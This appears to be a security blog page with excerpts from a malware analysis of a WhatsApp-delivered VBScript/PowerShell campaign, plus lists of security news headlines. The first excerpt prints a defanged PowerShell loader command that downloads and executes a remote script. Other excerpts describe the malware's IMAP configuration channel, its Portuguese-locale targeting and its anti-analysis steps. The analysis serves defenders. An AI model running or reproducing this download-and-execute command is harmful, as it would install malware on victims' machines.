WhatsApp_VBS_PowerShell
Appendix B — PowerShell Snippets (Defanged) Observed Malicious Loader Command (Do NOT Execute) —————————————————————- powershell.exe -ep bypass “[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;iex ((New-Object Net.WebClient).DownloadString(‘https://miportuarios[.]com/sisti/api.ps1’))” IMAP Bootstrap (Mailbox as Config Channel) —————————————————————- # Opens TLS IMAP to imap.terra.com.br:993, logs in, searches subject “data”, fetches latest body. # Shown here for analysis context only; do NOT run in production. # (The […]
Read More →WhatApp_PowerShell_VBS-S2
Overview – Second-stage VBScript is executed in-memory via ExecuteGlobal by a Stage‑0 loader. – Primary goals: Portuguese locale gating, anti-analysis checks, configuration bootstrap (IMAP → multi-domain /data.php → Pastebin), PowerShell stage launch, optional self-delete. Locale Targeting (PT-BR/PT-PT) —————————————————————- Function CheckSystemLanguage() ‘ OSLanguage 1046 = pt-BR, 2070 = pt-PT ‘ Registry fallback: HKCU\Control Panel\International\sLanguage starts with […]
Read More →
Malwarebytes- Scam-checking just got easier: Malwarebytes is now in ChatGPT February 2, 2026Malwarebytes' ChatGPT integration makes it the first cybersecurity provider that can deliver its expertise without ever leaving the chat
- How fake party invitations are being used to install remote access tools February 2, 2026Fake party invitations are used to install remote access tools, so the criminals are the ones invited.
- A week in security (January 26 – February 1) February 2, 2026A list of topics we covered in the week of January 26 to February 1 of 2026
- Scam-checking just got easier: Malwarebytes is now in ChatGPT February 2, 2026
- ThreatPost
- Student Loan Breach Exposes 2.5M Records August 31, 20222.5 million people were affected, in a breach that could spell more trouble down the line.
- Watering Hole Attacks Push ScanBox Keylogger August 30, 2022Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.
- Tentacles of ‘0ktapus’ Threat Group Victimize 130 Firms August 29, 2022Over 130 companies tangled in sprawling phishing campaign that spoofed a multi-factor authentication system.
- Ransomware Attacks are on the Rise August 26, 2022Lockbit is by far this summer’s most prolific ransomware group, trailed by two offshoots of the Conti group.
- Cybercriminals Are Selling Access to Chinese Surveillance Cameras August 25, 2022Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed.
- Student Loan Breach Exposes 2.5M Records August 31, 2022